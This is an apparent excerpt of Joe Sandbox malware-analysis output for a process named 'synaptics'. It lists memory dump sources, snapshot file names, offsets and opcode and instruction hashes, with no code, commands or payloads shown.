                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9C6000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9C6000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9c6000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d08fa36f9d9a4f5aabb16006032ddd9335f096254509877c90da7bd5ed41f4db
                                                                                                                                                                                                                                    • Instruction ID: 5b6e199bba322bb03501214741adf10ce04dce765cc662a5fc67dc8f52d457e6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d08fa36f9d9a4f5aabb16006032ddd9335f096254509877c90da7bd5ed41f4db
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0419DB1A05201CFDB40CF26C8857667BB1AF85328F098469E859CBB91D735E984CBA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 45a373a5915dd6bd19138a563aa740ce0f56627247ff88acc79c917aed0a6c05
                                                                                                                                                                                                                                    • Instruction ID: 7aa73b131450dc5b8cc5f2560595ba72167892ffaa9e5f3b850a710653cb1ae8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45a373a5915dd6bd19138a563aa740ce0f56627247ff88acc79c917aed0a6c05
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E3115306052218BEB018E25E4707A67FA0EF42358F28926CE89CCBA81D733D8C6C791
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a197b2bb19090ac7eac309ae86433bd083135b21bb996d041a6967fd8995cb54
                                                                                                                                                                                                                                    • Instruction ID: 7700b754b6bfb97459145a6dd92857edf8c4a0285e302e5a1826bf297871d0be
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a197b2bb19090ac7eac309ae86433bd083135b21bb996d041a6967fd8995cb54
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F412C357052018FD709CF29D480AA9B7E2EF89364B154169F86ACBB51EB30DC86CB91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 87d95428b25ad5248dea1083a42b9ecc9ec33b85b4f25d3434d6b9ba0c0c6108
                                                                                                                                                                                                                                    • Instruction ID: fb074c6c8bc0d9be7afeda8060fb25a9ea8d00143f41ac7a7bfd073d3ef90360
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87d95428b25ad5248dea1083a42b9ecc9ec33b85b4f25d3434d6b9ba0c0c6108
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A4122B4E05202CFE712DF68C99099DFBF1BF8A308B04896ED8959B741D771A885DF90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA72000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA72000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca72000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a94b90baf95b4a67d2afcbb38629af95d3fba536fce4b107354bf5cc80a90691
                                                                                                                                                                                                                                    • Instruction ID: ac0d61c3b9b8afa39cba8f3926a83e1922ff3a5f8ca9b1cf3a4ffe398540de5e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a94b90baf95b4a67d2afcbb38629af95d3fba536fce4b107354bf5cc80a90691
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4421DA77B001105BDB209A9AED45AEA73B4EFC42BAB080175FA48CBF00D725DC9997F0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA40000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca40000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3ab8e297bdec65899ade827edec7c88a88c0031cd0e36a29da076fdc53e25fee
                                                                                                                                                                                                                                    • Instruction ID: 90064e192b59686ad3b3ae69c830666527729d57b1531c5f0ca8f5e65e436d12
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab8e297bdec65899ade827edec7c88a88c0031cd0e36a29da076fdc53e25fee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021E7717042015BD7004AA9EC81B57B3E8EF91338F184279ED6CC7BD1EB65EC95C691
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA94000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA94000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca94000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9e2bb848fd2c44c558f0f2ac92efe7692148268c06f40aa27b115448a1860433
                                                                                                                                                                                                                                    • Instruction ID: f2b207e8f6454550ebb7976778aba43c65aa0264554b69ca4f2aba0696c519cf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2bb848fd2c44c558f0f2ac92efe7692148268c06f40aa27b115448a1860433
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D215735A161044BDB058E78D8427AA7FF9EB1731CF3C42A9DCB487A41D6338486DB81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB29000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB29000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb29000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4a8c2433a99bc7e7df23fb2e326ddfba6f2a60336ff3ca9018c028b2cdb94cda
                                                                                                                                                                                                                                    • Instruction ID: cf80e3ba408b0ed17bb4d1d34f0ee065e754859a6eef1dcc8a719bb3daf18bf2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a8c2433a99bc7e7df23fb2e326ddfba6f2a60336ff3ca9018c028b2cdb94cda
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0531E275E002488FD701CF59D4097EAB7F4EF86318F058296D80C9BA61E776A9C5CB92
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 32eb09b26fac0cff7e43e25f18b96e4228b4eec2182380f62de1114aa3099ea2
                                                                                                                                                                                                                                    • Instruction ID: 962f989fefdcb12ccfa42d0960a6154163810955fb8d054bffad7db5a042cfc8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32eb09b26fac0cff7e43e25f18b96e4228b4eec2182380f62de1114aa3099ea2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D318A71614B008FC714CF49E491AA6B7F5FB88324F14856ED868CBB62EB71E884CBD1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB13000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB13000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb13000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b3f3f8e622916bae562202d0234e448ac87a29dbba25229867e539fc576bf645
                                                                                                                                                                                                                                    • Instruction ID: 135ca85c17bf851e7bad911d00e3e00773fbfe3d5e0dcb6f535fe08704323193
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3f3f8e622916bae562202d0234e448ac87a29dbba25229867e539fc576bf645
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0131F172E046199FC710CF6DD88064AF3F9FF85328B1586AAD899A3B00E730B9518F81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d8e52149297cfe4ce78f09a158fd0d86bd32114c0b3eb848495ececd2b7b91c4
                                                                                                                                                                                                                                    • Instruction ID: 27158a00f41f7b16816eb183dca5c1617f7b7a365b272b887325a5fe0b9d5a39
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8e52149297cfe4ce78f09a158fd0d86bd32114c0b3eb848495ececd2b7b91c4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B621E5716047019BE7109F29D805B56B7F89B84329F04862EF93DC3BD1EB71E455C690
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7521d523698f8792af5b044e9c739609d141cc7cf221de18b2a6f4d1a861ece3
                                                                                                                                                                                                                                    • Instruction ID: b813d089219408fba0bb3293fe5462189195782a69afeffa2f40549e2d814a67
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7521d523698f8792af5b044e9c739609d141cc7cf221de18b2a6f4d1a861ece3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B21D7B1A041428BC710CA99DD419A977F4EB41338B090274FA78CBA60E732DDC7EB81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9FE000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9FE000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9fe000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 38e954f3972277a4850ff5825c7e2410a494c6fcebe1205dd9069f666e9285b6
                                                                                                                                                                                                                                    • Instruction ID: df2e92a49bdc0232f07a49cc40936e0d5c99e264872ba3a0816e0d149b25abb8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38e954f3972277a4850ff5825c7e2410a494c6fcebe1205dd9069f666e9285b6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20214972B051045B870497ADBC5546A7BBCDB8B23AB04037AFD3CC3F90EA12D81583D5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 21d56e4b62076c00672e5bfe41c34eb8dc9d79cd7cdb07e381e7f5e3b7555a3e
                                                                                                                                                                                                                                    • Instruction ID: a1104e94069041daf4743634e02e35658903f0947c015b0c6c7b8aed6a452c9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21d56e4b62076c00672e5bfe41c34eb8dc9d79cd7cdb07e381e7f5e3b7555a3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83216776D0210197D3048A65FC01ADA73B89F82338F240B28DC2993B80F726DA46C3C2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5abc867c425112fc6afda159a10975244c842af3035b99bcdc551afd1281c959
                                                                                                                                                                                                                                    • Instruction ID: e82c5b9b430f084071e6f7a566a0c8971e88bef6adc2dbaa6bbec7a0697d3bd6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5abc867c425112fc6afda159a10975244c842af3035b99bcdc551afd1281c959
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE217C71A00104AFDB04DF6CEC90E5AB7E9EB88314F24866DE848D7750E730AE859B90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9FE000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9FE000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9fe000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 632862c37520c217b7a633ca4eac173d846c1a273acafe2f364b8c8c37e6ea4e
                                                                                                                                                                                                                                    • Instruction ID: f437f514c1e84fff07b5982a413fe176c0ca4d50ef3f475e807dd16142c1351c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632862c37520c217b7a633ca4eac173d846c1a273acafe2f364b8c8c37e6ea4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2221C676B055105BCB10CE5DEC859A673BCEBC623DB1602AAED2C87F41EB21DC5687E0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 2ce6973811958db57d9fdebfaf9c4b5cf1bf3d77cc13a9883884739e108b2f44
                                                                                                                                                                                                                                    • Instruction ID: d2e56019b896e9ba862cee05484db0d3873deb262277788589e1821c9aad01fc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ce6973811958db57d9fdebfaf9c4b5cf1bf3d77cc13a9883884739e108b2f44
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21BE723052109FD7048F59E881996B7E4FB88334B14867AE96CC7791D732EC95CBD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b1c732b32a95f301ada842268537c9fecc1133f159ceccefc8614904982c8ed0
                                                                                                                                                                                                                                    • Instruction ID: f8db84362fe860e0467a3fbcfbdf89e84767124ee02908928042ca02285b5b04
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1c732b32a95f301ada842268537c9fecc1133f159ceccefc8614904982c8ed0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 192159B5E012089FCF04CFA9D981AAEB7F4EF4C214B14416AE918E7741E735ED55CBA0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6273a6c26e800192ba35b91af5c6c4b096658c8f0a3073521c4d88fd3796f265
                                                                                                                                                                                                                                    • Instruction ID: af61bc2e418b9e589b5f16d7fe0acb82098ca2cd05557f9ed73883967d193225
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6273a6c26e800192ba35b91af5c6c4b096658c8f0a3073521c4d88fd3796f265
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8211D6367151006B9B055E5DEC01DAB37ECEB4927970402AAFC2DC7691EB32D461E7E1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a621185b939a40ecba33d337da7e4832548c985448eec679f850795ef923a200
                                                                                                                                                                                                                                    • Instruction ID: ca363a2591a90119a9b9ab3e95823400c8f83b512b98021d101e2ddd93fece6c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a621185b939a40ecba33d337da7e4832548c985448eec679f850795ef923a200
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E611E172701104ABD7208E59EC01EEBB7ACEF413B8F15022AFC2887691E631E95487A4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C95F000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C95F000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c95f000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4bb7c3a266d826e993671da8da168a34cd55a74db73940dad8aa01c2a1767ef4
                                                                                                                                                                                                                                    • Instruction ID: 5d43ce6cecda7c5415f5a85485276016fd2aed25a72c4851daac196a9cf09e16
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bb7c3a266d826e993671da8da168a34cd55a74db73940dad8aa01c2a1767ef4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38218EB56016018BD314CF69E840B46B3F8AF4133CF24436CE4698B6A0C375E956CB81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 595ec40fcbaa2e77e6deb010a75a19bc0c94aa91ebbcfc61f08b274f8dece923
                                                                                                                                                                                                                                    • Instruction ID: b2d2b2c7c1a77d78f86a9b26468aa93fcb936e4e1f5cf4b6e93900c4a87730a0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 595ec40fcbaa2e77e6deb010a75a19bc0c94aa91ebbcfc61f08b274f8dece923
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1110A72B01210ABDB009E55FC01A9B33B9AB807BDF084136ED1897B40E776E8D5C7E5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB13000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB13000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb13000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1018f04bac22e67a586e19e9ae8564dcd906fac9abbc68a749722dc3b1568dfb
                                                                                                                                                                                                                                    • Instruction ID: bf0435ce0acc01af611b0e72f9e71a15369e0b6fa771b9594c7de0a62c7f7aa5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1018f04bac22e67a586e19e9ae8564dcd906fac9abbc68a749722dc3b1568dfb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90119071614649AFD701CE78D880949B3B8FF892287148762E919DB601F771F9A2CF90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C976000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C976000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c976000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0fbf9e1f8517071ff4923e4f54393557f7a8e03faac178055fae033ce3a82aae
                                                                                                                                                                                                                                    • Instruction ID: 07bd7afc883c11153e3d3fe9019db9f174b82a0863447fc3a0857943042ed7a1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fbf9e1f8517071ff4923e4f54393557f7a8e03faac178055fae033ce3a82aae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 051184356043445FC700DB24D845AABB7E8EBC9628F404A6EF95987780EB31E919CBD2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d532a03fd862aa8059f56e39708bf55a29d015ade0f98302793d95dab3b6cc2c
                                                                                                                                                                                                                                    • Instruction ID: 4ffe07fd8463642596eb7e5cab9c264a16b967d54cd46215737da19b7199dc6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d532a03fd862aa8059f56e39708bf55a29d015ade0f98302793d95dab3b6cc2c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54114832700500ABDF009E55FD01FAB37B9BB847BCF180129E92887B42EB30E896D794
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA06000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA06000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca06000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: bac8e928b2083ee9c673938840bafc1ed78d18551eab2b7cb0fdebc4ff6f74a9
                                                                                                                                                                                                                                    • Instruction ID: 73e6a48f063a9934cd037c76328f323c97f4e1fbf6ef9cd4a3a0320571a2fe5f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bac8e928b2083ee9c673938840bafc1ed78d18551eab2b7cb0fdebc4ff6f74a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF11CEB57046018FC7008F69E844A85BBF4EF46339F0446AAE828CB7A1E731D884CB81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8c3c7a135ef324f78f40aee394b9d6b60f5c7d9d7a7a441f9be04e446365b7d9
                                                                                                                                                                                                                                    • Instruction ID: 8e32566bf11b84a17d5aded4d4d57f8642fa38a47c277c44682be001fcdf2710
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c3c7a135ef324f78f40aee394b9d6b60f5c7d9d7a7a441f9be04e446365b7d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14118B31602600DFCBA1AF98EC4584A7FF2FF8E315B054569E19682960C732B892EF81
                                                                                                                                                                                                                                    Memory Dump Source
